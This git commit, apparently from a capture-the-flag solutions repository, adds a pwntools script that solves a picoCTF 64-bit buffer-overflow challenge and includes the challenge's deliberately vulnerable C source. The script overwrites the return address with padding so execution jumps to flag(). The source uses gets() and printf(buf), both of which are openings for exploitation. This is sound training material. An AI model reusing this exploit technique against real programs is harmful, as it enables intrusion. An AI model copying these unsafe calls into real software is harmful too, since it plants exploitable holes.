pwn/x_sixty_what
This commit is contained in:
parent
955da6e698
commit
acada7af66
|
@ -0,0 +1,33 @@
|
|||
#!/usr/bin/env nix-shell
|
||||
#!nix-shell -p python3 -i python3 python3Packages.pwntools
|
||||
|
||||
from pwn import *
|
||||
|
||||
exe = ELF("./vuln")
|
||||
|
||||
context.binary = exe
|
||||
|
||||
ADDR, PORT, *_ = "saturn.picoctf.net 63864".split()
|
||||
|
||||
def conn():
|
||||
if args.REMOTE:
|
||||
r = remote(ADDR, PORT)
|
||||
else:
|
||||
r = process([exe.path])
|
||||
|
||||
return r
|
||||
|
||||
def main():
|
||||
r = conn()
|
||||
|
||||
print(r.recvuntil(b"Welcome to 64-bit. Give me a string that gets you the flag:"))
|
||||
offset = 72 # found with pwndbg
|
||||
print(f"flag: {hex(exe.sym.flag)}")
|
||||
print(p64(exe.sym.flag))
|
||||
payload = b'A' * offset + p64(exe.sym.flag + 5) # skip one instruction for some reason...
|
||||
r.sendline(payload)
|
||||
print(r.recvall())
|
||||
r.close()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
Binary file not shown.
|
@ -0,0 +1,37 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/types.h>
|
||||
|
||||
#define BUFFSIZE 64
|
||||
#define FLAGSIZE 64
|
||||
|
||||
void flag() {
|
||||
char buf[FLAGSIZE];
|
||||
FILE *f = fopen("flag.txt","r");
|
||||
if (f == NULL) {
|
||||
printf("%s %s", "Please create 'flag.txt' in this directory with your",
|
||||
"own debugging flag.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
fgets(buf,FLAGSIZE,f);
|
||||
printf(buf);
|
||||
}
|
||||
|
||||
void vuln(){
|
||||
char buf[BUFFSIZE];
|
||||
gets(buf);
|
||||
}
|
||||
|
||||
int main(int argc, char **argv){
|
||||
|
||||
setvbuf(stdout, NULL, _IONBF, 0);
|
||||
gid_t gid = getegid();
|
||||
setresgid(gid, gid, gid);
|
||||
puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
|
||||
vuln();
|
||||
return 0;
|
||||
}
|
||||
|
Loading…
Reference in New Issue